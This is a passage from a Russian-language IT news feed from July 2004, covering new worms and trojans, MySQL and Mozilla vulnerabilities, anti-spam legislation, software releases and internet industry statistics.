Компания Symantec зафиксировала появление в интернете новой модификации вредоносной программы Korgo. Червь Korgo.X, как и его предыдущие варианты, при распространении использует уязвимость в локальной подсистеме аутентификации пользователей ОС Microsoft Windows 2000 и ХР. При попадании на машину вирус вносит изменения в реестр, добавляя ключи для собственного запуска и уничтожая ряд разделов, связанных со службами безопасности и обновления. Далее червь открывает произвольный ТСР-порт и рассылает копии своего кода. Наконец, вирус пытается соединиться с несколькими интернет-сайтами, в том числе kavkaz.tv, kidos-bank.ru, master-x.com, mazafaka.ru и parex-bank.ru.
compulenta.ru

12/07/2004 21:26 Microsoft выпустила .NET Framework 2.0 Beta 1
Microsoft выпустила первый бета-релиз .NET Framework 2.0, в который включено большое количество изменений и доработок в области веб-сервисов. Как заявляет Microsoft в описании новой бета-версии, "релиз .NET Framework 2.0 Beta 1 - важнейший этап в развитии веб-сервисов и стека XML в .NET Framework". Утверждается, что в платформу было внесено большое количество улучшений, в соответствии с запросами и нуждами пользователей. Среди нововведений есть и оптимизационные, есть и уточнения стандартов.
compulenta.ru

12/07/2004 21:25 "Яндекс" борется со спамом
Компания "Яндекс" объявила о внедрении в свою почтовую систему технологий защита от спама, которые некоторое время назад были предложены ей Microsoft. В частности, поддерживаются спецификации SPF (Sender Policy Framework) для определения правил обработки почтовых сообщений и Caller-ID,предназначенных для идентификации почтовых серверов. Обе системы построены по принципам DNS, когда почтовому адресу сопоставляется почтовый сервер, с которого он может прийти, и IP-адреса, на которых эти сервера могут работать. Сам "Яндекс" уже начал размечать письма в соответствии с этими стандартами, чтобы владельцы других почтовых серверов могли проверить аутентичность отправителя. А с 1 сентября такие метки будут учитываться спам-фильтром "Спамоборона", который установлен на всех почтовых системах "Яндекс" и у некоторых корпоративных клиентов. Таким образом, компания "Яндекс" поддержала спецификацию ASTA (Anti Spam Technical Alliance) - альянса, куда входят AOL, EarthLink, Comcast, BT, Microsoft, Yahoo.
osp.ru

12/07/2004 21:24 МТУ-Интел вводит новый тариф
12 июля 2004 г. Компания МТУ-Интел сообщает о вводе в действие нового тарифа для услуги СТРИМ. Тариф СТРИМ-ЛАЙТ - это $15 в месяц за 200 мегабайт трафика. Каждый мегабайт сверх оплаченного объема стоит $ 0,05. При этом, по сравнению со стандартным "Стримом", скорость канала будет снижена до 256 кбит/с. Сроки подключения ограничены и продлятся до 31 августа.
mtu-intel.ru

12/07/2004 21:24 Новый вирус Lemoor.a
Как сообщает «Лаборатория Касперского», в интернете появился новый вирус, который получил название Lemoor.a. Это вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в FTP-сервере червя Sasser. Таким образом, заражению подвержены только компьютеры, уже зараженные ранее сетевым червем Sasser.Червь написан на языке Assembler. Имеет размер 1985 байт, упакован FSG. Размер распакованного файла - около 20992 байт. При запуске червь регистрирует себя в ключе автозапуска: HKLM\SW\Microsoft\Windows\CurrentVersion\Run. Червь посылает широковещательный запрос по сети, и ждет отклика машин, зараженных червем Sasser. Получив требуемый ответ от машины-жертвы, при помощи уязвимости в FTP-сервере червя Sasser, запускает свою командную оболочку на произвольно выбранном порту. После этого, червь пересылает свое тело на машину-жертву и запускает его. Червь запрограммирован только на размножение, и других действий не выполняет.
viruslist.com

12/07/2004 21:23 Работника Microsoft обвиняют во взломе AltaVista
Один из сотрудников компании Microsoft столкнулся с обвинениями в хакерстве. 29-летний Лорен Шаве (Laurent Chavet) был арестован на прошлой неделе. Сотруднику софтверного гиганта предъявлены обвинения в незаконном доступе к компьютерам компании AltaVista в 2002 году. По данным ФБР, Шаве мог проникнуть в компьютерные системы AltaVista с целью кражи исходного кода одноименной поисковой системы. Стоит отметить, что подозреваемый некоторое время работал в AltaVista, но в 2002 году покинул эту компанию. Вменяемые ему взломы, Шаве совершил уже после ухода из AltaVista, однако до того, как устроился на работу в Microsoft. По этой причине никаких подозрений относительно заинтересованности Microsoft во взломах у следствия нет. По крайней мере, официально на этот счет ничего не сообщается. Вместе с тем, как сообщает Reuters со ссылкой на газету Seattle Post-Intelligencer, Шаве трудился именно в поисковом подразделении Microsoft. В самой Microsoft и в правоохранительных органах эти данные, впрочем, не подтверждают. Дело Шаве будет слушаться в федеральном окружном суде северной Калифорнии в Сан-Франциско. В выдвинутых против сотрудника Microsoft обвинениях фигурируют два случая незаконного доступа к ресурсам AltaVista: в марте и июне 2002 года. Слушания по делу Лорена Шаве начнутся 20 июля. Пока же после первого судебного заседания в Сиэтле, штат Вашингтон, обвиняемый был отпущен под залог в 10000 долларов США. В компании Yahoo, которой сейчас принадлежит AltaVista ситуацию пока не комментируют.
compulenta.ru

12/07/2004 21:23 Недельный отчет о вирусах от pandaSoftware
Вышел очередной недельный отчет о вирусах от pandaSoftware. В отчете рассмотрены вирус Lovgate.AO и три червя - Korgo.X, Evaman. A и Bagle.AD. Lovgate.AO – это вирус, имеющий характеристики червя и распространяющийся по электронной почте и через общие сетевые ресурсы, используя брешь переполнения буфера в интерфейсе RPC DCOM Interface. Korgo.X, который использует брешь Windows LSASS для распространения через Интернет и автоматического попадания на компьютеры.Следующий червь, Evaman.A, распространяется через электронную почту в сообщении, имитирующем сообщение об ошибке. Данное сообщение рассылается по всем обнаруженным на определенном веб сайте адресам.Завершается отчет описанием Bagle.AD, червя, распространяющегося по электронной почте и через программы обмена файлами P2P. Все описанные вредоносные программы поражают Windows-системы.
viruslab.ru

11/07/2004 20:06 Apache установлен на 67% серверов
Проведенное в июле Netcraft Web Server Survey показало статистику использования программного обеспечения на веб-серверах, сообщает ServerWatch.
Netcraft исследовало более 52 млн сайтов, что на 500 тыс больше, чем в июне. В отчете отмечено, что в июле исполняется 18 месяцев с того момента, как сеть непрерывно растет. Непрерывный рост продолжается с февраля 2003 года, когда было зарегистрировано наличие 35 млн сайтов. Эксперты отмечают, что, несмотря на рост, произошедший за последний месяц, позиции четверки лидеров в рейтинге ПО для веб-серверов практически не изменились. Публикуем топ-пять ПО для веб-серверов:
Apache - 67.37%
Microsoft-IIS - 21.32%
Netscape-Enterprise - 3.15%
Other - 2.19%
Zeus - 1.45%
www.webplanet.ru

11/07/2004 20:05 «Состояние и перспективы развития Интернета в России»
15–17 сентября 2004 года в подмосковном пансионате «Ватутинки» пройдет пятая международная конференция «Состояние и перспективы развития Интернета в России». Организатор мероприятия — общественно-государственное объединение «Ассоциация документальной электросвязи». В качестве основных направлений работы конференции определены: технологии телекоммуникаций, информационные технологии, обеспечение информационной безопасности, развитие рынков и инфраструктуры, влияние интернета на жизнь общества. Тема «Информационные технологии» включает в себя перспективы развития IP-телефонии, web-сервисы, технологии IP-вещания, оценка эффективности информационных технологий. На секции «Обеспечение информационной безопасности» будет проведен анализ потребностей рынка и оценка потребительских свойств систем обеспечения информационной безопасности, обсудят противодействие распространению вредоносных программ и спама, аудит и оценку уровня обеспечения информационной безопасности, развитие инфраструктуры открытых ключей.
www.webplanet.ru

11/07/2004 20:05 9 из 10 веб-приложений насквозь дырявы
90% существующих сегодня веб-приложений содержат в себе уязвимости, даже после того как разработчики анонсировали выпуск заплаток, сообщает Vnunet.
Исследование компании Imperva, занимающейся сетевой безопасностью, показало, что однажды найденные уязвимости веб-приложений даже после выпуска заплаток продолжают периодически «всплывать». Ни одно тестирование не выявляет всех багов в программном обеспечении, чем активно пользуются хакеры и авторы вирусов. Новые уязвимости появляются как вследствие повторного тестирования, так и вследствие наложения заплатки, не говоря уже о случаях естественной эволюции веб-приложения на конкретном сервере.
www.webplanet.ru

11/07/2004 20:04 Бум пиратского видео в самом разгаре
Почти четверть пользователей интернет мира хоть раз скачивали «нелицензионный» фильм. 17% скачавших, как сообщает исследование, сделали это с целью не платить за приобретение лицензионной копии или за поход в кинотеатр. Американская Ассоциация кинопроизводителей (MPAA), спонсировавшая исследование, называет пиратство не иначе как «глобальная эпидемия». Исследование MPAA охватило пользователей интернет из 8 стран: Южной Кореи, Австралии, Франции, Германии, Италии, Японии, Великобритании и США. Наиболее активной зоной пиратства признана Южная Корея. 58% интернет-пользователей этой страны занимались скачиванием контрафакта, причем треть из этого числа заявили, что таким образом сэкономили деньги семейного бюджета. Исследование также обнаружило, что половина пиратствующих пользователей впервые начали скачивать фильмы в течение последнего года. MPAA уверено, что с повсеместным распространением широкополосных соединений уровень пиратства будет только расти. 56% опрошенных заявили, что продолжат скачивать видео из сети, а 17% из тех, кто ни разу не занимался этим неблагородным делом, сказали корреспондентам, что обязательно скачают фильмец-другой в ближайшие 12 месяцев, пишет Reuters.
www.webplanet.ru

11/07/2004 20:03 Регистраторы против «Регтайма»
На этой неделе компания-регистратор доменных имен «Регтайм» совершила неоднозначный поступок. Используя базу данных whois РосНИИРОС, она совершила массовую рассылку, предлагая владельцам доменов обслуживаться у «Регтайм». «Вебпланета» решила узнать мнения других регистраторов. Как они относятся рассылке коллег из «Регтайма»? Представители Ru-Center, «Гарант-Парк-Телеком», «Караван» единогласно дали отрицательную оценку поступку «Регтайма». "Мы считаем, что подобное поведение и данный способ работы с клиентской базой некорректен. Свою деятельность на рынке все же необходимо строить исходя из общеизвестных принципов ведения бизнеса." Любые рассылки рекламного характера являются нарушением правил работы в сети Интернет. Бизнес регистратора тесно связан с интернетом, поэтому негоже регистратору нарушать эти самые правила. Представитель Ru-Center, Алексей Лесников добавил, что полученные письма необходимо квалифицировать как незапрошенную информацию (спам). В Координационный центр домена ru, занимающийся вопросами аккредитации регистраторов, по факту массовой рассылки писем направлено обращение с предложением о лишении ООО «РегТайм» статуса регистратора в связи с недопустимостью подобных действий.
www.webplanet.ru

11/07/2004 20:03 В России появится законодательство, регулирующее e-commerce
Российские депутаты решили помочь развитию электронной коммерции: в среду по инициативе думского комитета по информационной политике и Национальной Ассоциации Участников Электронной Торговли (НАУЭТ) в нижней палате Парламента состоялся круглый стол «Законодательное регулирование электронной коммерции в Российской Федерации». Участники мероприятия, в состав которых наряду с парламентариями вошли министерские чиновники и представители электронного бизнеса России, признали, что существующая нормативная база никак не способствует продуктивному использованию информационных технологий в коммерции. В связи с этим было принято решение разработать необходимые законодательные поправки, которые к сентябрю текущего года планируется представить для согласования в профильные министерства (Минэкономразвития и торговли, Министерство по информатизации и связи). Оттуда законопроекты должны попасть на рассмотрение в Думу.
www.webplanet.ru

11/07/2004 20:02 Выпущена бета-версия KDE 3.3
Сообщество kde.org объявило о выпуске бета-версии оконного менеджера для ОС Linux - KDE 3.3. Выход беты был запланирован уже давно, и разработчики торопятся с выпуском окончательной версии к конференции aKademy, которая пройдет с 21 по 29 августа 2004 года, на ней KDE 3.3 и будет представлен официально в готовом виде. Отметим, что, по заявлению kde.org, бета-версия отличается достаточной стабильностью: список найденных ошибок пока пуст, и kde.org призывает всех желающих примкнуть к сообществу бета-тестеров, чтобы убедиться в стабильности работы оконного менеджера либо обнаружить неизвестные до сих пор ошибки. Список нововведений достаточно велик и включает в себя улучшения как базовых функций, так и дополнительных.
compulenta.ru

11/07/2004 20:01 Система безопасности на основе Bluetooth
Сотрудники Лидского университета в Великобритании разрабатывают технологию, которая, в перспективе, позволит измерять расстояние между устройствами с поддержкой беспроводной связи ближнего радиуса действия Bluetooth. Предполагается, что новая методика найдет применение, прежде всего, в сфере безопасности. Исследователи выделяют несколько возможных областей использования технологии. Во-первых, разработка могла бы обеспечить защиту от кражи карманных компьютеров, ноутбуков или мобильных телефонов. Попытка выноса таких устройств из помещения приведет к изменению расстояния между ними и Bluetooth-приемником, что позволит подать соответствующий сигнал, к примеру, на пульт дежурного охранника. Во-вторых, система сможет помочь при поиске спасателей или пожарных в горящем здании. В-третьих, методика может использоваться для автоматического составления схем расположения оборудования на крупных промышленных объектах. Кстати, погрешности при измерении расстояния не будут превышать 50 см. Следует, впрочем, заметить, что у создаваемой технологии имеется и существенный недостаток. В частности, радиус действия Bluetooth-связи составляет всего несколько десятков метров, что накладывает серьезные ограничения на возможности разрабатываемой системы. Тем не менее, на развитие проекта уже выделено 240 тысяч фунтов стерлингов.
compulenta.ru

11/07/2004 19:59 QNX 4.25 - сертифицированная ОС Реального Времени
Компания "СВД Встраиваемые Системы", объявила о сертификации Государственной технической комиссией при Президенте РФ операционной системы реального времени QNX 4.25. Теперь разработчики АСУТП и встроенных решений смогут применять работающее под ее управлением прикладное ПО без модификации не только в экспортных комплексах двойного назначения, но и в системах, предназначенных для внутреннего рынка России. В СВД полагают, что в результате сертификации перед заказчиками этой компании "откроются дополнительные возможности в области внедрения новейших решений в реализуемых ими проектах". В рамках сертификации специалисты испытательной лаборатории осуществили аттестацию производства СВД, что позволяет тиражировать выпускаемые решения.
www.osp.ru

10/07/2004 22:38 Российский антиспамовый закон: первый блин комом
Борьба со спамом в России активизируется. От осознания вредности этого явления и необходимости его искоренения, через многочисленные заявления и декларации, посвященные этой тематике, инициативные группы и законотворцы перешли к подготовке поправок к законодательству. За последнее время Госдуме было предложено сразу два антиспамерских законопроекта - от Мосгордумы и московского отделения фракции “Единая Россия”. К сожалению, оба они далеки от совершенства. Отмечается, что в предлагаемых поправках к ФЗ «О рекламе» не предусмотрены случаи, когда в виде спама рассылаются объявления частных лиц, открытые оферты, ругательства и т.д. а в тексте дополнений к Уголовному кодексу и Кодексу об административных правонарушениях отсутствует описание объективной стороны правонарушения. Соответствующие статьи ссылаются на другие законодательные акты, в частности, к ФЗ «О рекламе». Однако в Кодексе об административных правонарушениях уже существует статья, предусматривающая ответственность за нарушение ФЗ «О рекламе». Таким образом, предлагаемое дополнение к Кодексу дублирует уже существующую в нем норму. "К сожалению, рассмотренный на заседании законопроект не только не поможет в борьбе со спамом, но и, наоборот, узаконит его, - считает г-н Альтовский, координатор рабочей группы. - Законопроект разрешает рассылать спам, при условии, что объем рассылки невелик и спам не рассылается в адрес лиц, отказавшихся от его получения. При этом в законопроекте не прописан механизм оценки масштабов рассылки. Порядок отказа от получения спама, установленный в законопроекте, юридически несостоятелен. Таким образом, спам фактически легализуется. Аналитики в беседах с обозревателем CNews.ru отмечали, что в законопроекте, предлагаемом Мосгордумой, спаму дается чуть более широкое определение, а предлагаемые меры наказания спамеров несколько менее строгие, хотя основные положения сходны с проектом "Единой России". Массовой признается рассылка в 2,5 тысяч адресов в течение 24 часов или в 25 тысяч адресов в течение 30 дней, или в 250 тысяч адресов в течение одного года. Рассылка спама, по предложению Мосгордумы, должна повлечь за собой наложение штрафа на граждан в размере 10-15 минимальных размеров оплаты труда (МРОТ), на должностных лиц - 20-30 МРОТ, на юридических лиц - 500-1000 МРОТ. По мнению экспертов, можно ожидать, что в нынешнем виде этот проект также получит критическую оценку Экспертного совета Комитета Государственной Думы по безопасности. Таким образом, несмотря на эйфорию, поднятую рядом СМИ по поводу одного факта появления антиспамерских законопроектов, до принятия действующих и эффективных законов еще далеко. Любые законопроекты должны быть тщательнейшим образом проработаны экспертами в области юриспруденции, информационных технологий, телекоммуникаций.
CNews.ru

10/07/2004 22:37 MySQL пускает без пароля
Компания NGSSoftware опубликовала свое исследование системы безопасности сервера баз данных MySQL, который поставляется с открытыми исходными кодами. Оказалось, что в службе аутентификации СУБД есть ошибка, которая позволяет при определенных обстоятельствах использовать для подключения к серверу пароль нулевой длины. Кроме того, в том же механизме аутентификации обнаружено несколько возможностей для переполнения буфера: в функциях check_connection() и my_rnd(). Производитель MySQL выпустил исправления, поэтому пользователям рекомендуется обновить используемые СУБД до версии 4.1.3 или 5.0.
www.osp.ru

10/07/2004 22:37 40% ПК в мире не защищены от вирусов
Несмотря на то, что все больше пользователей становятся жертвами виртуальных атак, в том числе вирусных, четыре из десяти пользователей не спешат обезопасить себя от вирусов и червей. Такая статистика выливается в поразительные цифры: мировой ущерб от кибер-угроз исчисляется миллиардами долларов.
В настоящее время каждый день появляется порядка 10-15 новых вирусов и обнаруживается 7 уязвимостей в том или иной программном обеспечении. Об этом заявил Джузеппе Веррини (Giuseppe Verrini), вице-президент компании Symantec в регионе EMEA. Эксперт объяснил, что для написания вирусов злоумышленникам требуется все меньше необходимых навыков, а это ведет к стремительному росту количества вредоносных программ. Кроме того, время между созданием вируса и его распространением в интернете постоянно сокращается. Поэтому компании, работающие на рынке инфобезопасности, вынуждены реагировать все на новые угрозы. Можно разрабатывать продукты своими собственными силами, а можно купить компанию, которая зарекомендовала себя в создании технологии, способной вывести антивирусный и любой другой продукт на качественно новый уровень. Symantec, например, пошла по второму пути – за последние 4 года этот гигант успел купить 13 компаний и органично «вплести» их в свой бизнес.
CNews.ru

10/07/2004 22:36 Медленный интернет мешает быстрому распространению видеопиратства
Ассоциация производителей кинопродукции США (MPAA) изучила масштабы интернет-пиратства в отношении кино- и видеопродукции. По инициативе ассоциации был проведен опрос интернет-пользователей в нескольких странах мира, который показал, что каждый четвертый из них хотя бы один раз нелегально скачивал пиратский фильм, сообщает BBC News. Наибольшее количество потребителей пиратской продукции оказалось в Южной Корее - там пиратские копии голливудских фильмов скачивают более, чем в два раза чаще, нежели в других странах, где проводился опрос. На вопрос о том, скачивали ли они фильмы, ответили более половины южнокорейских пользователей. Самый низкий показатель - среди жителей Японии - 10 процентов. В самих США положительно ответили более 20 процентов опрошенных. Аналитики MPAA считают, что распространение пиратских копий по Интернету будет со временем увеличиваться по мере распространения широкополосных абонентских интернет-соединений. При недостаточно высокой скорости соединения скачать один фильм, как правило, затруднительно из-за большого объема файла. Лидерство Южной Кореи в опросе обусловлено именно тем, что там большинство пользователей подключено к Интернету по широкополосному выделенному каналу.
lenta.ru

10/07/2004 22:35 Fujitsu вплотную занялась коммерческой стеганографией
Текст, спрятанный в картинке, не виден человеческому глазу, но прекрасно различается цифровой камерой, встроенной в мобильный телефон или карманный компьютер. Стеганография – это такой метод сокрытия некой секретной информации в графическом изображении. При этом изменения, внесенные в картинку, не заметны постороннему глазу до тех пор, пока любопытствующий глаз не вооружится специальным инструментом, позволяющим вычленить нужный текст из окружающего его «графического шума». В случае с изобретением компании Fujitsu таким инструментом является объектив цифровой фотокамеры. Используя разработанный японскими программистами алгоритм шифрования, в каждом квадратном сантиметре обычной на первый взгляд картинки можно дополнительно разместить до двенадцати цифровых символов. Как пишет CNET, такой метод шифрования вполне применим в рекламном деле: все нужные адреса и номера телефонов можно разместить в рекламном постере или на визитной карточке, а извлечь ее смогут лишь владельцы специальным образом настроенных мобильных телефонов, PDA и других электронных безделушек, оснащенных цифровыми камерами.
www.internet.ru

10/07/2004 22:34 Доля спама занимает до 70% всей электронной почты в мире
Спам в настоящее время составляет около 70% всей электронной почты в мире. Эти данные приводит американская компания MessageLabs, специализирующаяся на создании программ-фильтров. В апреле этого года количество рассылаемого спама (в основном, рекламных объявлений) снова резко увеличилось. "Мы считаем, что к середине года доля спама возрастет до 80%", - говорит эксперт по информационной безопасности Наташа Стэли, работающая в MessageLabs. Компания Commtouch Software, которая разрабатывает программное обеспечение для борьбы со спамом, провела исследования с намерением выяснить, какая страна является лидером в рассылке нежелательной корреспонденции.В ходе анализа выяснилось, что доминирующее положение занимает США. 55,7% сообщений, которые засоряют почтовые ящики организаций и частных пользователей всего мира, отсылаются именно из этой страны. Второе место по данному показателю занимает Корея - оттуда отправляется 10,2% спама. На третьем месте располагается Китай с 6,6% мирового спам-трафика.
Лидирующее место США эксперты оправдывают тем, что в стране много высокоскоростных линий соединения с Интернетом. Между тем, спам меняется не только количественно, но и качественно. По данным производителя программ-фильтров, Clearswift, доля порнографии в нем упала до 5%, зато доля финансовой информации, прежде всего, рекламы дешевых кредитов и биржевых прогнозов, возросла до 38%. На первом же месте (40%) - по-прежнему медицинская реклама.
Убытки от спама (потери рабочего времени, расходы на программы-фильтры и борьбу с занесенными вирусами) составляют в США порядка $10 млрд. в год. Соответствующая цифра для Британии - 3.2 млрд. фунтов. Об этом сообщает ВВС.
crime-research.ru

10/07/2004 22:33 Южная Корея создает подразделение по борьбе с киберпреступностью
Южнокорейское Национальное полицейское управление до конца этого года создаст новое подразделение компьютерного антитеррора. К необходимости подобного шага его руководство пришло после того, как в Южной Корее зафиксированы попытки взлома правительственных информационных сетей и распространения через Интернет такой, к примеру, информации, как изображение обезглавленного недавно в Ираке повстанцами южнокорейского заложника.
Если до сих пор борьбой с кибертеррором в главном полицейском ведомстве страны занимались всего несколько специалистов, то в новом подразделении станут работать 110 человек и его возглавит высокопоставленный полицейский чин. Структурно оно будет состоять из четырех отделов: предотвращения террористической деятельности в киберпространстве, разработки новых технологий по борьбе с хакерами, расследования преступлений, совершаемых в сети Интернет, и обеспечения международного сотрудничества с зарубежными коллегами. Пока что наиболее серьезными случаями проявления компьютерного терроризма стали попытки взлома сетей шести правительственных организаций, включая Корейский институт оборонных исследований (КИДА). Начиная с марта прошлого года, как раз после начала вторжения американцев в Ирак, различные антивоенные и антиамериканские организации, даже из Бразилии, пытались взломать 60 местных Интернет-сайтов.
crime-research.ru

10/07/2004 22:31 SPB IT не повторит ошибок ITNews.spb.ru
5-го июля открыт портал SPB IT, посвященный IT-сфере Северо-Запада России. Ресурс предлагает ежедневные новости из мира IT, а также обзоры, аналитику, интервью, анонсы мероприятий и направлен в первую очередь на IT-специалистов, желающих быть в курсе последних событий.
www.internet.ru

9/07/2004 19:22 Защита от нежелательных USB-устройств
Компания "Смарт Лайн Инк" объявила о выходе новой версии программы DeviceLock 5.6, средства предотвращения внутренних угроз корпоративной безопасности. Версия 5.6 включает в себя новейший механизм аутентификации USB-устройств, что позволяет администраторам создавать "белые" списки разрешенных к использованию USB-устройств. Администратор может запретить использование любых USB-устройств, кроме разрешенных корпоративной политикой безопасности. Например, можно запретить все USB устройства, кроме определенной модели USB-ключей (USB Token), использующихся в компании для аутентификации пользователей. Кроме доступа к USB-портам, DeviceLock позволяет контролировать весь спектр потенциально опасных устройств: дисководы, CD-ROM, а также FireWire, инфракрасные, LPT- и COM-порты, WiFi- и Bluetooth-адаптеры.
Источник

9/07/2004 12:03 Windows XP 64-Bit Edition пока не поддерживает процессоры Intel
Общедоступную бета-версию 64-разрядного варианта Windows XP - Windows XP 64-Bit Edition for 64-Bit Extended Systems - можно установить только на системы с процессорами AMD Opteron или Athlon 64. В процессе инсталляции производится соответствующая проверка, и в случае использования процессора Intel процесс прекращается. Как объясняют в Microsoft, это сделано по инициативе разработчиков 64-разрядной Windows, поскольку ни на каких других процессорах, кроме AMD, ОС не тестировалась. Данная бета-версия вышла в сентябре прошлого года, до того как Intel объявила о планах по выпуску 32-разрядного процессорного ядра с 64-разрядными расширениями Nocona. Между наборами команд Opteron и Nocona есть несколько небольших различий. Процессоры Intel не поддерживают мультимедиа-расширения AMD 3DNow, а в процессорах AMD отсутствует технология hyperthreading, реализуемая Xeon. Кроме того, Opteron поддерживает две команды, позволяющие процессору оперативнее переключаться между приложениями. Эти инструкции были добавлены уже после опубликования AMD спецификаций, которыми в Intel воспользовались при создании Nocona. Правда, по мнению специалистов, сколько-нибудь заметной прибавки в производительности эти команды не дают. По сообщению информированных источников, новая бета-версия Windows, совместимая с Nocona, должна появиться к концу августа. Финальная версия ОС, которая, как обещают в Intel и Microsoft, будет без каких-либо различий работать и на Xeon, и на Opteron, выйдет в IV квартале этого года.
osp.ru

9/07/2004 11:05 Выход Mozilla 1.7.1, Mozilla Firefox 0.9.2 и Mozilla Thunderbird 0.7.2
Вчера The Mozilla Organization объявила о выпуске новых версий трёх своих продуктов - браузера (и не только) Mozilla, автономного браузера Mozilla Firefox, а также почтового клиента Mozilla Thunderbird.
Сайт проекта

9/07/2004 10:48 Троян Afcore открывает "черный ход" в систему
Специалисты компании Sophos предупреждают о появлении в Сети очередного вируса, сообщает "Компьюлента". Вредоносная программа Afcore представляет собой трояна, заражающего компьютеры с ОС Microsoft Windows. Вирус состоит из двух компонентов: исполняемого файла и dll-модуля, который записывается во временный каталог Windows. После запуска троян открывает "черный ход" в систему, благодаря чему злоумышленники могут получить несанкционированный доступ к удаленному компьютеру. Перезагрузка инфицированной машины иногда приводит к автоматическому удалению обоих компонентов вируса. Компания Sophos охарактеризовала троян Afcore как малоопасный.
Описание трояна

9/07/2004 10:24 Способы обнаружения и исправления ошибок в Linux приложениях
Довольно интересную для разработчиков Linux-приложений статью обнаружил посетитель нашего форума. Статья является переводом оригинальной статьи Guido Socher (автор перевода - Пухляков Кирилл) под названием "Почему это не работает!? Способы обнаружения и исправления ошибок в Linux приложениях". Как пишет сам автор, "Многие говорят, что найти и исправить ошибки в приложениях под Linux не так уж и трудно. Но к сожалению очень проблематично найти документацию, рассказывающую о том как это сделать. В этой заметке вы узнаете как найти и исправить ошибки в приложении, не разбираясь как оно работает".
Статья

9/07/2004 10:11 Неприятная уязвимость в Mozilla/Firefox
Как сообщает bugtraq.ru, в браузере Mozilla/Firefox обнаружена уязвимость. Использование URL, начинающихся с "shell:", позволяет выполнить на клиентской машине произвольный код. К чести разработчиков стоит отметить, что патч уже доступен. Подобная схема работает только под XP. IE, в принципе, тоже запускает указанные таким образом приложения, но, по крайней мере, показывает перед этим диалог Open/Save.
Патч

9/07/2004 09:48 Интеллектуальные технологии борьбы с неизвестными вирусами и вторжениями
Panda Software объявляет о запуске технологий TruPrevent – наиболее интеллектуальных технологий борьбы с неизвестными вирусами и вторжениями. Эти технологии представляют радикально новый подход к борьбе с Интернет угрозами. Традиционный подход заключается в реагировании на появление вируса, а интеллектуальные технологии направлены на предупреждение проблемы. Бета версии новых продуктов, включающих эти технологии, уже доступны. Дополнение традиционных антивирусных и защитных систем новыми технологиями TruPrevent как никогда ранее увеличивают уровень защиты от растущего числа Интернет угроз, в том числе неизвестных вирусов и вторжений. Понимая это, в течение третьего квартала 2004 года Panda Software выпустит новые продукты, разработанные для защиты как домашних пользователей и профессионалов, так и небольших и крупных предприятий. Данные продукты дополнят традиционную антивирусную защиту и совместимы даже с продуктами, выпущенными иными производителями, чем Panda Software. Интернет угрозы становятся все быстрее с каждым днем, что требует максимально оперативного реагирования со стороны компьютерных пользователей и антивирусных компаний для избежания эпидемий. Червям Sasser, Mydoom и SQLSlammer удалось в течение нескольких минут заразить тысячи компьютеров, что показывает возможность создания вирусов, на которые времени среагировать у человека не будет. Помимо этого существует проблема: растущее использование других приемов повреждения компьютерных систем, например, это приемы использования программных брешей, переполнения буфера, и т.д. Ситуация вызывает еще большее беспокойство, если принять во внимание мгновенные угрозы. Такие угрозы могут появиться в ближайшем будущем и будут способны распространяться гораздо быстрее человеческой реакции – тогда основа антивирусной отрасли станет бесполезной.
Описание

9/07/2004 09:34 Бреши в интернет-безопасности лишают компании 2 млн долларов
Упущенная выгода интернет-компаний в результате каждого масштабного вирусного инцидента составляет в среднем около 2 млн долларов. С таким заявлением выступили представители исследовательской фирмы Aberdeen, сообщает CNET News. В ходе исследования сотрудники Aberdeen опросили представителей 162 компаний. 84% респондентов заявили, что инциденты в области интернет-безопасности наносили ущерб их бизнесу. В среднем на долю каждой компании приходилось по одному серьезному вирусному инциденту. Однако 15% участников опроса сообщили, что за три года страдали от вирусов более семи раз. Для компаний, чей бизнес в первую очередь ориентируется на интернет, прогнозы вирусной активности выглядят тревожно. Около трех четвертей участников опроса Aberdeen сообщили об увеличении объема онлайн-продаж и клиентского обслуживания, 55% намереваются расширять интернет-закупки и 48% собираются активизировать интернет-дистрибуцию. «Активное использование интернета для реализации ключевых бизнес-задач означает, что интернет-безопасность серьезно влияет на доходы компаний», - отметили в Aberdeen. Для компании с годовым оборотом в пределах 10 млн долларов упущенная выгода может составить около 6700 долларов. Фирмы с оборотом около 30 млрд в результате вирусных атак могут потерять до 20,1 млн долларов.
Источник

8/07/2004 15:08 Очередной шаг эмуляторов ОС
По мотивам linux.org.ru. Ни для кого не секрет, что не для всего ПО существуют аналоги в ОС Linux. Для запуска этого ПО и используются эмуляторы и виртуальные машины. Под Linux их значительно больше чем под другие ОС (так много ПО не имеет аналогов :-)) Но, как правило, эмулируемой ОС является часто упоминаемая M$ Windows. Но здесь речь пойдет о MacOSX. ОС, предназначенной для работы, а не для бесконечной настройки в поисках совершенства. Все уже настроено для вас. Все приложения стабильны и не предъявляют кучу зависимостей, как нередко бывает с исходниками Linux приложений. Эмулятор MacOSX называется PearPС. Поддерживаемые им ОС расширились в очередной раз. На этот раз осуществили с помощью этого эмулятора запуск MacOSX 10.4 codename Tiger Pre release. А так же Mandrake Linux PPC 10.0 official.
Подробности

8/07/2004 13:48 Специалисты по безопасности сами латают Windows
После перехода Microsoft на политику выпуска заплаток раз в месяц очень многие пользователи вынуждены оставаться беззащитными до выпуска этих обновлений. Особенно показательна в этой ситуации атака конца июня, когда через уязвимость IE, которую обнаружили исследователи безопасности ещё 10 месяцев назад (уязвимость в ActiveX - компоненте ADODB.Stream),была использована для лавинообразного заражения кучи компьютеров с использованием российского сервера. M$ была вынуждена (а как ещё можно назвать подобную нерасторопность компьютерного гиганта?) выпустить заплатку и рекомендации по отключению этой компоненты методом правки реестра. Однако, как мы писали ранее, тут же исследователи (в частности - Елмер Куперус из Голландии) опубликовали о существовании уязвимость в другой компоненте ActiveX - Application.Shell. При этом были также опубликованы меры по правке реестра (мы писали об этом). И опять Microsoft безмолствует. В подобной ситуации уже сами специалисты по безопасности выпускают свои программы для защиты Windows. Об одной подобной программе от eEye мы уже писали. Она представляет собой комплексный патч для защиты компонентов IE. Нечто подобное выпустила и компания PivX Solutions, руководимая Тором Лархолмом. Её решение носит название Qwik-Fix. Как написано в анонсе продукта, он предназначен для защиты машин под управлением ОС Windows от вирусов, троянов и прочей нечисти. При этом программа описывается, как не вызывающая проблем при работе с антивирусами, файрволлами. Как пишут сами авторы, в Qwik-Fix применена методика, позволяющая защитить зону безопасности IE - "my local machine" (изначально невидимую в IE без правки реестра), что становится особенно актуальным в свете крайних эпидемий. Нечто подобное выпущено было компанией Smartalec Technologies под названием SmartFix (хотя, по мнению испытывавших эту программу, она значительно подгружает систему). Естественно, пользователи Интернет вправе выбрать то, что называется альтернативными браузерами (и это будет правильно, кстати), однако 